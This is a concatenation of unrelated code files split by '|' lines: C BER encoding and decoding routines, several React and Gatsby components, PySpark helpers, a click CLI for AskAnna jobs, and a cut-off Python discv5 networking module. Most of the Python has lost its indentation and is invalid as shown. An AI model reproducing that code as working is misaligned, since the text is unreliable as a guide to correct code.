ber_init2( ber, NULL, options );
}
/* New C-API ber_init() */
/* This function constructs a BerElement containing a copy
** of the data in the bv argument.
*/
BerElement *
ber_init( struct berval *bv )
{
BerElement *ber;
assert( bv != NULL );
if ( bv == NULL ) {
return NULL;
}
ber = ber_alloc_t( 0 );
if( ber == NULL ) {
/* allocation failed */
return NULL;
}
/* copy the data */
if ( ((ber_len_t) ber_write ( ber, bv->bv_val, bv->bv_len, 0 ))
!= bv->bv_len )
{
/* write failed, so free and return NULL */
ber_free( ber, 1 );
return NULL;
}
ber_reset( ber, 1 ); /* reset the pointer to the start of the buffer */
return ber;
}
/* New C-API ber_flatten routine */
/* This routine allocates a struct berval whose contents are a BER
** encoding taken from the ber argument. The bvPtr pointer points to
** the returned berval.
**
** ber_flatten2 is the same, but uses a struct berval passed by
** the caller. If alloc is 0 the returned bv uses the ber buf directly.
*/
int ber_flatten2(
BerElement *ber,
struct berval *bv,
int alloc )
{
assert( bv != NULL );
if ( bv == NULL ) {
return -1;
}
if ( ber == NULL ) {
/* ber is null, create an empty berval */
bv->bv_val = NULL;
bv->bv_len = 0;
} else if ( ber->ber_sos_ptr != NULL ) {
/* unmatched "{" and "}" */
return -1;
} else {
/* copy the berval */
ber_len_t len = ber_pvt_ber_write( ber );
if ( alloc ) {
bv->bv_val = (char *) ber_memalloc_x( len + 1, ber->ber_memctx );
if ( bv->bv_val == NULL ) {
return -1;
}
AC_MEMCPY( bv->bv_val, ber->ber_buf, len );
bv->bv_val[len] = '\0';
} else if ( ber->ber_buf != NULL ) {
bv->bv_val = ber->ber_buf;
bv->bv_val[len] = '\0';
} else {
bv->bv_val = "";
}
bv->bv_len = len;
}
return 0;
}
int ber_flatten(
BerElement *ber,
struct berval **bvPtr)
{
struct berval *bv;
int rc;
assert( bvPtr != NULL );
if(bvPtr == NULL) {
return -1;
}
bv = ber_memalloc_x( sizeof(struct berval), ber->ber_memctx );
if ( bv == NULL ) {
return -1;
}
rc = ber_flatten2(ber, bv, 1);
if (rc == -1) {
ber_memfree_x(bv, ber->ber_memctx);
} else {
*bvPtr = bv;
}
return rc;
}
void
ber_reset( BerElement *ber, int was_writing )
{
assert( ber != NULL );
assert( LBER_VALID( ber ) );
if ( was_writing ) {
ber->ber_end = ber->ber_ptr;
ber->ber_ptr = ber->ber_buf;
} else {
ber->ber_ptr = ber->ber_end;
}
ber->ber_rwptr = NULL;
}
/*
* A rewrite of ber_get_next that can safely be called multiple times
* for the same packet. It will simply continue where it stopped until
* a full packet is read.
*/
#define LENSIZE 4
ber_tag_t
ber_get_next(
Sockbuf *sb,
ber_len_t *len,
BerElement *ber )
{
assert( sb != NULL );
assert( len != NULL );
assert( ber != NULL );
assert( SOCKBUF_VALID( sb ) );
assert( LBER_VALID( ber ) );
if ( ber->ber_debug & LDAP_DEBUG_TRACE ) {
ber_log_printf( LDAP_DEBUG_TRACE, ber->ber_debug,
"ber_get_next\n" );
}
/*
* Any ber element looks like this: tag length contents.
* Assuming everything's ok, we return the tag byte (we
* can assume a single byte), return the length in len,
* and the rest of the undecoded element in buf.
*
* Assumptions:
* 1) small tags (less than 128)
* 2) definite lengths
* 3) primitive encodings used whenever possible
*
* The code also handles multi-byte tags. The first few bytes
* of the message are read to check for multi-byte tags and
* lengths. These bytes are temporarily stored in the ber_tag,
* ber_len, and ber_usertag fields of the berelement until
* tag/len parsing is complete. After this parsing, any leftover
* bytes and the rest of the message are copied into the ber_buf.
*
* We expect tag and len to be at most 32 bits wide.
*/
if (ber->ber_rwptr == NULL) {
assert( ber->ber_buf == NULL );
ber->ber_rwptr = (char *) &ber->ber_len-1;
ber->ber_ptr = ber->ber_rwptr;
ber->ber_tag = 0;
}
while (ber->ber_rwptr > (char *)&ber->ber_tag && ber->ber_rwptr <
(char *)&ber->ber_len + LENSIZE*2) {
ber_slen_t sblen;
char buf[sizeof(ber->ber_len)-1];
ber_len_t tlen = 0;
/* The tag & len can be at most 9 bytes; we try to read up to 8 here */
sock_errset(0);
sblen=((char *)&ber->ber_len + LENSIZE*2 - 1)-ber->ber_rwptr;
/* Trying to read the last len byte of a 9 byte tag+len */
if (sblen<1)
sblen = 1;
sblen=ber_int_sb_read( sb, ber->ber_rwptr, sblen );
if (sblen<=0) return LBER_DEFAULT;
ber->ber_rwptr += sblen;
/* We got at least one byte, try to parse the tag. */
if (ber->ber_ptr == (char *)&ber->ber_len-1) {
ber_tag_t tag;
unsigned char *p = (unsigned char *)ber->ber_ptr;
tag = *p++;
if ((tag & LBER_BIG_TAG_MASK) == LBER_BIG_TAG_MASK) {
ber_len_t i;
for (i=1; (char *)p<ber->ber_rwptr; i++) {
tag <<= 8;
tag |= *p++;
if (!(tag & LBER_MORE_TAG_MASK))
break;
/* Is the tag too big? */
if (i == sizeof(ber_tag_t)-1) {
sock_errset(ERANGE);
return LBER_DEFAULT;
}
}
/* Did we run out of bytes? */
if ((char *)p == ber->ber_rwptr) {
sock_errset(EWOULDBLOCK);
return LBER_DEFAULT;
}
}
ber->ber_tag = tag;
ber->ber_ptr = (char *)p;
}
if ( ber->ber_ptr == ber->ber_rwptr ) {
sock_errset(EWOULDBLOCK);
return LBER_DEFAULT;
}
/* Now look for the length */
if (*ber->ber_ptr & 0x80) { /* multi-byte */
int i;
unsigned char *p = (unsigned char *)ber->ber_ptr;
int llen = *p++ & 0x7f;
if (llen > LENSIZE) {
sock_errset(ERANGE);
return LBER_DEFAULT;
}
/* Not enough bytes? */
if (ber->ber_rwptr - (char *)p < llen) {
sock_errset(EWOULDBLOCK);
return LBER_DEFAULT;
}
for (i=0; i<llen; i++) {
tlen <<=8;
tlen |= *p++;
}
ber->ber_ptr = (char *)p;
} else {
tlen = *(unsigned char *)ber->ber_ptr++;
}
/* Are there leftover data bytes inside ber->ber_len? */
if (ber->ber_ptr < (char *)&ber->ber_usertag) {
if (ber->ber_rwptr < (char *)&ber->ber_usertag) {
sblen = ber->ber_rwptr - ber->ber_ptr;
} else {
sblen = (char *)&ber->ber_usertag - ber->ber_ptr;
}
AC_MEMCPY(buf, ber->ber_ptr, sblen);
ber->ber_ptr += sblen;
} else {
sblen = 0;
}
ber->ber_len = tlen;
/* now fill the buffer. */
/* make sure length is reasonable */
if ( ber->ber_len == 0 ) {
sock_errset(ERANGE);
return LBER_DEFAULT;
}
if ( sb->sb_max_incoming && ber->ber_len > sb->sb_max_incoming ) {
ber_log_printf( LDAP_DEBUG_CONNS, ber->ber_debug,
"ber_get_next: sockbuf_max_incoming exceeded "
"(%ld > %ld)\n", ber->ber_len, sb->sb_max_incoming );
sock_errset(ERANGE);
return LBER_DEFAULT;
}
if (ber->ber_buf==NULL) {
ber_len_t l = ber->ber_rwptr - ber->ber_ptr;
/* ber->ber_ptr is always <= ber->ber_rwptr.
* make sure ber->ber_len agrees with what we've
* already read.
*/
if ( ber->ber_len < sblen + l ) {
sock_errset(ERANGE);
return LBER_DEFAULT;
}
ber->ber_buf = (char *) ber_memalloc_x( ber->ber_len + 1, ber->ber_memctx );
if (ber->ber_buf==NULL) {
return LBER_DEFAULT;
}
ber->ber_end = ber->ber_buf + ber->ber_len;
if (sblen) {
AC_MEMCPY(ber->ber_buf, buf, sblen);
}
if (l > 0) {
AC_MEMCPY(ber->ber_buf + sblen, ber->ber_ptr, l);
sblen += l;
}
*ber->ber_end = '\0';
ber->ber_ptr = ber->ber_buf;
ber->ber_usertag = 0;
if ((ber_len_t)sblen == ber->ber_len) {
goto done;
}
ber->ber_rwptr = ber->ber_buf + sblen;
}
}
if ((ber->ber_rwptr>=ber->ber_buf) && (ber->ber_rwptr<ber->ber_end)) {
ber_slen_t res;
ber_slen_t to_go;
to_go = ber->ber_end - ber->ber_rwptr;
/* unsigned/signed overflow */
if (to_go<0) return LBER_DEFAULT;
sock_errset(0);
res = ber_int_sb_read( sb, ber->ber_rwptr, to_go );
if (res<=0) return LBER_DEFAULT;
ber->ber_rwptr+=res;
if (res<to_go) {
sock_errset(EWOULDBLOCK);
return LBER_DEFAULT;
}
done:
ber->ber_rwptr = NULL;
*len = ber->ber_len;
if ( ber->ber_debug ) {
ber_log_printf( LDAP_DEBUG_TRACE, ber->ber_debug,
"ber_get_next: tag 0x%lx len %ld contents:\n",
ber->ber_tag, ber->ber_len );
ber_log_dump( LDAP_DEBUG_BER, ber->ber_debug, ber, 1 );
}
return (ber->ber_tag);
}
/* invalid input */
return LBER_DEFAULT;
}
char *
ber_start( BerElement* ber )
{
return ber->ber_buf;
}
int
ber_len( BerElement* ber )
{
return ( ber->ber_end - ber->ber_buf );
}
int
ber_ptrlen( BerElement* ber )
{
return ( ber->ber_ptr - ber->ber_buf );
}
void
ber_rewind ( BerElement * ber )
{
ber->ber_rwptr = NULL;
ber->ber_sos_ptr = NULL;
ber->ber_end = ber->ber_ptr;
ber->ber_ptr = ber->ber_buf;
#if 0 /* TODO: Should we add this? */
ber->ber_tag = LBER_DEFAULT;
ber->ber_usertag = 0;
#endif
}
int
ber_remaining( BerElement * ber )
{
return ber_pvt_ber_remaining( ber );
}
|
import axios from 'axios'
import React, { Component } from 'react'
import ApiData from './ApiData'
export class Home extends Component {
constructor() {
super()
this.state = {
apiData:[],
showData:false,
message:"",
showMessage:false
}
}
componentDidMount = async ()=>{
const url = "http://localhost:8000/retreive"
const responseData = await axios(url);
this.setState({
apiData:responseData.data,
showData:true,
})
}
addFavorite = async (item) => {
const saveToDb = await axios("http://localhost:8000/create");
this.setState({
message: saveToDb
})
}
render() {
console.log(this.state.apiData);
return (
<>
{this.state.showData &&
<ApiData
apiData={this.state.apiData}
/>}
</>
)
}
}
export default Home
|
import React from 'react'
import styles from './Control.module.scss'
import clsx from 'clsx'
export default function Control(props) {
const { name, inputType, type, onChange, placeholder, className, ...rest } = props;
let input = null;
if(inputType === 'textarea'){
input = <textarea name={name} onChange={onChange} placeholder={placeholder} {...rest} />
} else {
input = <input type={type} name={name} onChange={onChange} placeholder={placeholder} {...rest} />
}
return(
<div className={clsx(styles.control, className)}>
{input}
</div>
)
}
|
import React from 'react'
import { graphql } from 'gatsby'
import Helmet from 'react-helmet'
import get from 'lodash/get'
import Img from 'gatsby-image'
import Layout from '../components/layout'
import heroStyles from '../components/hero.module.css'
import recipeStyles from './recipe.module.css'
class RecipeTemplate extends React.Component {
render() {
const recipe = get(this.props, 'data.contentfulRecipe')
const siteTitle = get(this.props, 'data.site.siteMetadata.title')
console.log(recipe);
return (
<Layout location={this.props.location} >
<div style={{ background: '#fff' }}>
<Helmet title={`${recipe.title} | ${siteTitle}`} />
<div className={heroStyles.hero}>
<Img className={heroStyles.heroImage} alt={recipe.title} fluid={recipe.heroImage.fluid} />
</div>
<div className="wrapper">
<h1 className="section-headline">{recipe.title}</h1>
<p
style={{
display: 'block',
}}
>
</p>
<div
className="section-headline"
dangerouslySetInnerHTML={{
__html: recipe.instructions.instructions,
}}
/>
{recipe.ingredients &&
<div>
<span className={recipeStyles.title}>Ingredients</span>
<ul>
{recipe.ingredients.list.map(ingredient => (
<li key={ingredient}>
{ingredient}
</li>
))}
</ul>
</div>
}
</div>
</div>
</Layout>
)
}
}
export default RecipeTemplate
export const pageQuery = graphql`
query RecipeBySlug($slug: String!) {
site {
siteMetadata {
title
}
}
contentfulRecipe(slug: { eq: $slug }) {
title
orderIndex
heroImage {
fluid(maxWidth: 1180, background: "rgb:000000") {
...GatsbyContentfulFluid_tracedSVG
}
}
instructions {
instructions
}
ingredients {
list
}
}
}
`
|
from pyspark import SparkConf, SparkContext
from pyspark.sql import SparkSession, SQLContext
def get_spark_session():
# load Spark session
spark = SparkSession.builder.master("local[64]").appName("PySparkShell").getOrCreate()
conf = SparkConf().setAppName("PySparkShell").setMaster("local[64]")
sc = SparkContext.getOrCreate(conf)
sqlContext = SQLContext(sc)
return spark, sc, sqlContext
def read_csv(spark, infile):
return spark.read \
.option("header", "true") \
.option("inferSchema", "true") \
.csv(infile)
def write_csv(df, outfile):
df.write.csv(outfile, header=True)
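# ---------------------------------------------------------------------------
# Minimal usage sketch for the helpers above (assumptions: "input.csv" and
# "out_dir" are placeholder paths, not part of the original module).
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    spark, sc, sqlContext = get_spark_session()
    df = read_csv(spark, "input.csv")       # header row + inferred schema
    df.printSchema()
    write_csv(df.limit(100), "out_dir")     # writes a directory of CSV part files
    spark.stop()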
|
# -*- coding: utf-8 -*-
import click
import sys
from askanna import job as aa_job
from askanna import project as aa_project
from askanna.cli.utils import ask_which_job, ask_which_project, ask_which_workspace
from askanna.core.config import Config
from askanna.core.utils import extract_push_target
config = Config()
@click.group()
def cli1():
pass
@cli1.command(help="List jobs available in AskAnna",
short_help="List jobs")
@click.option(
"--project", "-p", "project_suuid",
required=False,
type=str,
help="Project SUUID to list jobs for a project"
)
def list(project_suuid):
jobs = aa_job.list(project_suuid)
if not jobs:
click.echo("Based on the information provided, we cannot find any jobs.")
sys.exit(0)
elif project_suuid:
project = aa_project.detail(project_suuid)
print("The jobs for project \"{}\" are:\n".format(project.name))
print("JOB SUUID JOB NAME")
print("------------------- -------------------------")
else:
print("PROJECT SUUID PROJECT NAME JOB SUUID JOB NAME")
print("------------------- -------------------- ------------------- -------------------------")
for job in sorted(jobs, key=lambda x: (x.project["name"], x.name)):
if project_suuid:
print("{job_suuid} {job_name}".format(
job_suuid=job.short_uuid,
job_name=job.name[:25]))
else:
print("{project_suuid} {project_name} {job_suuid} {job_name}".format(
project_suuid=job.project["short_uuid"],
project_name="{:20}".format(job.project["name"])[:20],
job_suuid=job.short_uuid,
job_name=job.name[:25]))
@click.group()
def cli2():
pass
@cli2.command(help="Change job information in AskAnna", short_help="Change job")
@click.option("--id", "-i", "suuid", required=False, type=str, help="Job SUUID")
@click.option("--name", "-n", required=False, type=str, help="New name to set")
@click.option("--description", "-d", required=False, type=str, help="New description to set")
def change(suuid, name, description):
if not suuid:
try:
push_target = extract_push_target(config.push_target)
except ValueError as e: # noqa
# the push-target is not set, so don't bother reading it
project_suuid = None
else:
project_suuid = push_target.get("project_suuid")
if not project_suuid:
workspace = ask_which_workspace(question="From which workspace do you want to change a job?")
project = ask_which_project(question="From which project do you want to change a job?",
workspace_suuid=workspace.short_uuid)
project_suuid = project.short_uuid
job = ask_which_job(question="Which job do you want to change?", project_suuid=project_suuid)
suuid = job.short_uuid
if not name and not description:
if click.confirm("\nDo you want to change the name of the job?"):
name = click.prompt("New name of the job", type=str)
if click.confirm("\nDo you want to change the description of the job?"):
description = click.prompt("New description of the job", type=str)
click.confirm("\nDo you want to change the job?", abort=True)
aa_job.change(suuid=suuid, name=name, description=description)
cli = click.CommandCollection(sources=[cli1, cli2], help="Manage your jobs in AskAnna",
short_help="Manage jobs in AskAnna")
|
import itertools
from typing import (
AsyncContextManager,
AsyncIterator,
Collection,
Dict,
List,
Optional,
Set,
Tuple,
)
from async_generator import asynccontextmanager
from async_service import Service, background_trio_service
from eth_enr import ENRAPI, ENRManagerAPI, QueryableENRDatabaseAPI
from eth_enr.exceptions import OldSequenceNumber
from eth_typing import NodeID
from eth_utils import ValidationError, get_extended_debug_logger
from eth_utils.toolz import cons, first, take
from lru import LRU
import trio
from ddht._utils import adaptive_timeout, every, reduce_enrs, weighted_choice
from ddht.base_message import InboundMessage
from ddht.constants import ROUTING_TABLE_BUCKET_SIZE
from ddht.endpoint import Endpoint
from ddht.exceptions import (
DuplicateProtocol,
EmptyFindNodesResponse,
MissingEndpointFields,
)
from ddht.kademlia import (
KademliaRoutingTable,
at_log_distance,
compute_log_distance,
iter_closest_nodes,
)
from ddht.token_bucket import TokenBucket
from ddht.v5_1.abc import (
ClientAPI,
DispatcherAPI,
EventsAPI,
NetworkAPI,
NetworkProtocol,
PoolAPI,
TalkProtocolAPI,
)
from ddht.v5_1.constants import ROUTING_TABLE_KEEP_ALIVE
from ddht.v5_1.exceptions import ProtocolNotSupported
from ddht.v5_1.explorer import Explorer
from ddht.v5_1.messages import (
FindNodeMessage,
PingMessage,
PongMessage,
TalkRequestMessage,
)
from ddht.validation import validate_found_nodes_distances
UNRESPONSIVE_CACHE = LRU(2048)
@asynccontextmanager
async def common_recursive_find_nodes(
network: NetworkProtocol,
target: NodeID,
*,
concurrency: int = 3,
unresponsive_cache: Dict[NodeID, float] = UNRESPONSIVE_CACHE,
) -> AsyncIterator[trio.abc.ReceiveChannel[ENRAPI]]:
"""
An optimized version of the recursive lookup algorithm for a kademlia
network.
Continually look up nodes in the target part of the network, keeping track
of all of the nodes we have seen.
Exit once we have queried all of the `k` closest nodes to the target.
The concurrency structure here is optimized to minimize the effect of
unresponsive nodes on the total time it takes to perform the recursive
lookup. Some requests will hang for up to 10 seconds. The
`adaptive_timeout` combined with the multiple concurrent workers helps
mitigate the overall slowdown caused by a few unresponsive nodes since the
other queries can be issued concurrently.
"""
network.logger.debug2("Recursive find nodes: %s", target.hex())
start_at = trio.current_time()
# The set of NodeID values we have already queried.
queried_node_ids: Set[NodeID] = set()
# The set of NodeID that timed out
#
# The `local_node_id` is
# included in this as a convenience mechanism so that we don't have to
# continually filter it out of the various filters
unresponsive_node_ids: Set[NodeID] = {network.local_node_id}
# We maintain a cache of nodes that were recently deemed unresponsive
# within the last 5 minutes (300 seconds).
unresponsive_node_ids.update(
node_id
for node_id, last_unresponsive_at in unresponsive_cache.items()
if trio.current_time() - last_unresponsive_at < 300
)
# Accumulator of the node_ids we have seen
received_node_ids: Set[NodeID] = set()
# Tracker for node_ids that are actively being requested.
in_flight: Set[NodeID] = set()
condition = trio.Condition()
def get_unqueried_node_ids() -> Tuple[NodeID, ...]:
"""
Get the three nodes that are closest to the target such that the node
is in the closest `k` nodes which haven't been deemed unresponsive.
"""
# Construct an iterable of *all* the nodes we know about ordered by
# closeness to the target.
candidates = iter_closest_nodes(
target, network.routing_table, received_node_ids
)
# Remove any unresponsive nodes from that iterable
responsive_candidates = itertools.filterfalse(
lambda node_id: node_id in unresponsive_node_ids, candidates
)
# Grab the closest K
closest_k_candidates = take(
network.routing_table.bucket_size, responsive_candidates,
)
# Filter out any from the closest K that we've already queried or that are in-flight
closest_k_unqueried = itertools.filterfalse(
lambda node_id: node_id in queried_node_ids or node_id in in_flight,
closest_k_candidates,
)
return tuple(take(3, closest_k_unqueried))
async def do_lookup(
node_id: NodeID, send_channel: trio.abc.SendChannel[ENRAPI]
) -> None:
"""
Perform an individual lookup on the target part of the network from the
given `node_id`
"""
if node_id == target:
distance = 0
else:
distance = compute_log_distance(node_id, target)
try:
found_enrs = await network.find_nodes(node_id, distance)
except (trio.TooSlowError, MissingEndpointFields, ValidationError):
unresponsive_node_ids.add(node_id)
unresponsive_cache[node_id] = trio.current_time()
return
except trio.Cancelled:
# We don't add these to the unresponsive cache since they didn't
# necessarily exceed the full 10s request/response timeout.
unresponsive_node_ids.add(node_id)
raise
for enr in found_enrs:
try:
network.enr_db.set_enr(enr)
except OldSequenceNumber:
pass
async with condition:
new_enrs = tuple(
enr for enr in found_enrs if enr.node_id not in received_node_ids
)
received_node_ids.update(enr.node_id for enr in new_enrs)
for enr in new_enrs:
try:
await send_channel.send(enr)
except (trio.BrokenResourceError, trio.ClosedResourceError):
# In the event that the consumer of `recursive_find_nodes`
# exits early before the lookup has completed we can end up
# operating on a closed channel.
return
async def worker(
worker_id: NodeID, send_channel: trio.abc.SendChannel[ENRAPI]
) -> None:
"""
Pulls unqueried nodes from the closest k nodes and performs a
concurrent lookup on them.
"""
for round in itertools.count():
async with condition:
node_ids = get_unqueried_node_ids()
if not node_ids:
await condition.wait()
continue
# Mark the node_ids as having been queried.
queried_node_ids.update(node_ids)
# Mark the node_ids as being in-flight.
in_flight.update(node_ids)
# Some of the node ids may have come from our routing table.
# These won't be present in the `received_node_ids` so we
# detect this here and send them over the channel.
try:
for node_id in node_ids:
if node_id not in received_node_ids:
enr = network.enr_db.get_enr(node_id)
received_node_ids.add(node_id)
await send_channel.send(enr)
except (trio.BrokenResourceError, trio.ClosedResourceError):
# In the event that the consumer of `recursive_find_nodes`
# exits early before the lookup has completed we can end up
# operating on a closed channel.
return
if len(node_ids) == 1:
await do_lookup(node_ids[0], send_channel)
else:
tasks = tuple(
(do_lookup, (node_id, send_channel)) for node_id in node_ids
)
try:
await adaptive_timeout(*tasks, threshold=1, variance=2.0)
except trio.TooSlowError:
pass
async with condition:
# Remove the `node_ids` from the in_flight set.
in_flight.difference_update(node_ids)
condition.notify_all()
async def _monitor_done(send_channel: trio.abc.SendChannel[ENRAPI]) -> None:
async with send_channel:
async with condition:
while True:
# this `fail_after` is a failsafe to prevent deadlock situations
# which are possible with `Condition` objects.
with trio.move_on_after(60) as scope:
node_ids = get_unqueried_node_ids()
if not node_ids and not in_flight:
break
else:
await condition.wait()
if scope.cancelled_caught:
network.logger.error("Deadlock")
send_channel, receive_channel = trio.open_memory_channel[ENRAPI](256)
async with trio.open_nursery() as nursery:
nursery.start_soon(_monitor_done, send_channel)
for worker_id in range(concurrency):
nursery.start_soon(worker, worker_id, send_channel)
async with receive_channel:
yield receive_channel
nursery.cancel_scope.cancel()
elapsed = trio.current_time() - start_at
network.logger.debug(
"Lookup for %s finished in %f seconds: seen=%d queried=%d unresponsive=%d",
target.hex(),
elapsed,
len(received_node_ids),
len(queried_node_ids),
len(unresponsive_node_ids),
)
@asynccontextmanager
async def common_network_stream_find_nodes(
network: NetworkAPI,
node_id: NodeID,
endpoint: Endpoint,
distances: Collection[int],
*,
request_id: Optional[bytes] = None,
) -> AsyncIterator[trio.abc.ReceiveChannel[ENRAPI]]:
if not distances:
raise TypeError("Must provide at least one distance")
if endpoint is None:
endpoint = await network.endpoint_for_node_id(node_id)
async def _stream_find_nodes_response(
send_channel: trio.abc.SendChannel[ENRAPI],
) -> None:
async with network.client.stream_find_nodes(
node_id, endpoint, distances=distances, request_id=request_id
) as resp_aiter:
async with send_channel:
async for response in resp_aiter:
enrs = response.message.enrs
for enr in enrs:
try:
await send_channel.send(enr)
except (trio.BrokenResourceError, trio.ClosedResourceError):
break
send_channel, receive_channel = trio.open_memory_channel[ENRAPI](256)
async with trio.open_nursery() as nursery:
nursery.start_soon(
_stream_find_nodes_response, send_channel,
)
try:
async with receive_channel:
try:
yield receive_channel
except trio.EndOfChannel as err:
raise trio.TooSlowError from err
finally:
nursery.cancel_scope.cancel()
class Network(Service, NetworkAPI):
_bootnodes: Tuple[ENRAPI, ...]
_talk_protocols: Dict[bytes, TalkProtocolAPI]
def __init__(self, client: ClientAPI, bootnodes: Collection[ENRAPI],) -> None:
self.logger = get_extended_debug_logger("ddht.Network")
self.client = client
self._bootnodes = tuple(bootnodes)
self.routing_table = KademliaRoutingTable(
self.client.enr_manager.enr.node_id, ROUTING_TABLE_BUCKET_SIZE,
)
self._routing_table_ready = trio.Event()
self._last_pong_at = LRU(2048)
self._talk_protocols = {}
self._ping_handler_ready = trio.Event()
self._find_nodes_handler_ready = trio.Event()
async def ready(self) -> None:
await self._ping_handler_ready.wait()
await self._find_nodes_handler_ready.wait()
#
# Proxied ClientAPI properties
#
@property
def local_node_id(self) -> NodeID:
return self.client.local_node_id
@property
def events(self) -> EventsAPI:
return self.client.events
@property
def dispatcher(self) -> DispatcherAPI:
return self.client.dispatcher
@property
def enr_manager(self) -> ENRManagerAPI:
return self.client.enr_manager
@property
def pool(self) -> PoolAPI:
return self.client.pool
@property
def enr_db(self) -> QueryableENRDatabaseAPI:
return self.client.enr_db
#
# TALK API
#
def add_talk_protocol(self, protocol: TalkProtocolAPI) -> None:
if protocol.protocol_id in self._talk_protocols:
raise DuplicateProtocol(
f"A protocol is already registered for '{protocol.protocol_id!r}'"
)
self._talk_protocols[protocol.protocol_id] = protocol
#
# High Level API
#
async def bond(
self, node_id: NodeID, *, endpoint: Optional[Endpoint] = None
) -> bool:
self.logger.debug2(
"Bonding with %s", node_id.hex(),
)
try:
pong = await self.ping(node_id, endpoint=endpoint)
except trio.TooSlowError:
self.logger.debug("Bonding with %s timed out during ping", node_id.hex())
return False
except MissingEndpointFields:
self.logger.debug(
"Bonding with %s failed due to missing endpoint information",
node_id.hex(),
)
return False
try:
enr = await self.lookup_enr(
node_id, enr_seq=pong.enr_seq, endpoint=endpoint
)
except trio.TooSlowError:
self.logger.debug(
"Bonding with %s timed out during ENR retrieval", node_id.hex(),
)
return False
except EmptyFindNodesResponse:
self.logger.debug(
"Bonding with %s failed due to them not returing their ENR record",
node_id.hex(),
)
return False
self.routing_table.update(enr.node_id)
self.logger.debug(
"Bonded with %s successfully", node_id.hex(),
)
self._routing_table_ready.set()
return True
async def _bond(self, node_id: NodeID, endpoint: Optional[Endpoint] = None) -> None:
await self.bond(node_id, endpoint=endpoint)
async def ping(
self,
node_id: NodeID,
*,
endpoint: Optional[Endpoint] = None,
request_id: Optional[bytes] = None,
) -> PongMessage:
if endpoint is None:
endpoint = await self.endpoint_for_node_id(node_id)
response = await self.client.ping(node_id, endpoint, request_id=request_id)
return response.message
async def find_nodes(
self,
node_id: NodeID,
*distances: int,
endpoint: Optional[Endpoint] = None,
request_id: Optional[bytes] = None,
) -> Tuple[ENRAPI, ...]:
if not distances:
raise TypeError("Must provide at least one distance")
if endpoint is None:
endpoint = await self.endpoint_for_node_id(node_id)
responses = await self.client.find_nodes(
node_id, endpoint, distances=distances, request_id=request_id
)
# Validate that all responses are indeed at one of the
# specified distances.
for response in responses:
validate_found_nodes_distances(response.message.enrs, node_id, distances)
return tuple(enr for response in responses for enr in response.message.enrs)
def stream_find_nodes(
self,
node_id: NodeID,
endpoint: Endpoint,
distances: Collection[int],
*,
request_id: Optional[bytes] = None,
) -> AsyncContextManager[trio.abc.ReceiveChannel[ENRAPI]]:
return common_network_stream_find_nodes(
self, node_id, endpoint, distances, request_id=request_id
)
async def talk(
self,
node_id: NodeID,
*,
protocol: bytes,
payload: bytes,
endpoint: Optional[Endpoint] = None,
request_id: Optional[bytes] = None,
) -> bytes:
if endpoint is None:
endpoint = await self.endpoint_for_node_id(node_id)
response = await self.client.talk(
node_id, endpoint, protocol, payload, request_id=request_id
)
payload = response.message.payload
if not payload:
raise ProtocolNotSupported(protocol)
return response.message.payload
async def lookup_enr(
self, node_id: NodeID, *, enr_seq: int = 0, endpoint: Optional[Endpoint] = None
) -> ENRAPI:
if node_id == self.local_node_id:
raise Exception(f"Cannot lookup local ENR: node_id={node_id.hex()}")
try:
enr = self.enr_db.get_enr(node_id)
except KeyError:
if endpoint is None:
# Try to use a recursive network lookup to find the desired
# node.
async with self.recursive_find_nodes(node_id) as enr_aiter:
async for found_enr in enr_aiter:
if found_enr.node_id == node_id:
endpoint = Endpoint.from_enr(found_enr)
break
else:
# we weren't given an endpoint and we don't have an enr which would give
# us an endpoint, there's no way to reach this node.
raise KeyError(f"Could not find ENR: node_id={node_id.hex()}")
else:
if enr.sequence_number >= enr_seq:
return enr
enr = await self._fetch_enr(node_id, endpoint=endpoint)
try:
self.enr_db.set_enr(enr)
except OldSequenceNumber:
pass
return enr
async def _fetch_enr(
self, node_id: NodeID, *, endpoint: Optional[Endpoint]
) -> ENRAPI:
enrs = await self.find_nodes(node_id, 0, endpoint=endpoint)
if not enrs:
raise EmptyFindNodesResponse(f"{node_id.hex()} did not return its ENR")
# Assuming we're given enrs for a single node, this reduce returns the enr for
# that node with the highest sequence number
return reduce_enrs(enrs)[0]
def recursive_find_nodes(
self, target: NodeID
) -> AsyncContextManager[trio.abc.ReceiveChannel[ENRAPI]]:
return common_recursive_find_nodes(self, target)
@asynccontextmanager
async def explore(
self, target: NodeID, concurrency: int = 3,
) -> AsyncIterator[trio.abc.ReceiveChannel[ENRAPI]]:
explorer = Explorer(self, target, concurrency)
with trio.move_on_after(300) as scope:
async with background_trio_service(explorer):
await explorer.ready()
async with explorer.stream() as receive_channel:
yield receive_channel
if scope.cancelled_caught:
self.logger.error("Timeout from `stream_locate`")
#
# Long Running Processes
#
async def run(self) -> None:
self.manager.run_daemon_child_service(self.client)
await self.client.wait_listening()
self.manager.run_daemon_task(self._periodically_report_routing_table)
self.manager.run_daemon_task(self._ping_oldest_routing_table_entry)
self.manager.run_daemon_task(self._track_last_pong)
self.manager.run_daemon_task(self._manage_routing_table)
self.manager.run_daemon_task(self._pong_when_pinged)
self.manager.run_daemon_task(self._serve_find_nodes)
self.manager.run_daemon_task(self._handle_unhandled_talk_requests)
await self.manager.wait_finished()
async def _periodically_report_routing_table(self) -> None:
async for _ in every(30, initial_delay=10):
non_empty_buckets = tuple(
reversed(
tuple(
(idx, bucket)
for idx, bucket in enumerate(self.routing_table.buckets, 1)
if bucket
)
)
)
total_size = sum(len(bucket) for idx, bucket in non_empty_buckets)
bucket_info = "|".join(
tuple(
f"{idx}:{'F' if len(bucket) == self.routing_table.bucket_size else len(bucket)}"
for idx, bucket in non_empty_buckets
)
)
self.logger.debug(
"routing-table-info: size=%d buckets=%s", total_size, bucket_info,
)
async def _ping_oldest_routing_table_entry(self) -> None:
await self._routing_table_ready.wait()
while self.manager.is_running:
# Here we preserve the lazy iteration while still checking that the
# iterable is not empty before passing it into `min` below which
# throws an ambiguous `ValueError` otherwise if the iterable is
# empty.
nodes_iter = self.routing_table.iter_all_random()
try:
first_node_id = first(nodes_iter)
except StopIteration:
await trio.sleep(ROUTING_TABLE_KEEP_ALIVE)
continue
else:
least_recently_ponged_node_id = min(
cons(first_node_id, nodes_iter),
key=lambda node_id: self._last_pong_at.get(node_id, 0),
)
too_old_at = trio.current_time() - ROUTING_TABLE_KEEP_ALIVE
try:
last_pong_at = self._last_pong_at[least_recently_ponged_node_id]
except KeyError:
pass
else:
if last_pong_at > too_old_at:
await trio.sleep(last_pong_at - too_old_at)
continue
did_bond = await self.bond(least_recently_ponged_node_id)
if not did_bond:
self.routing_table.remove(least_recently_ponged_node_id)
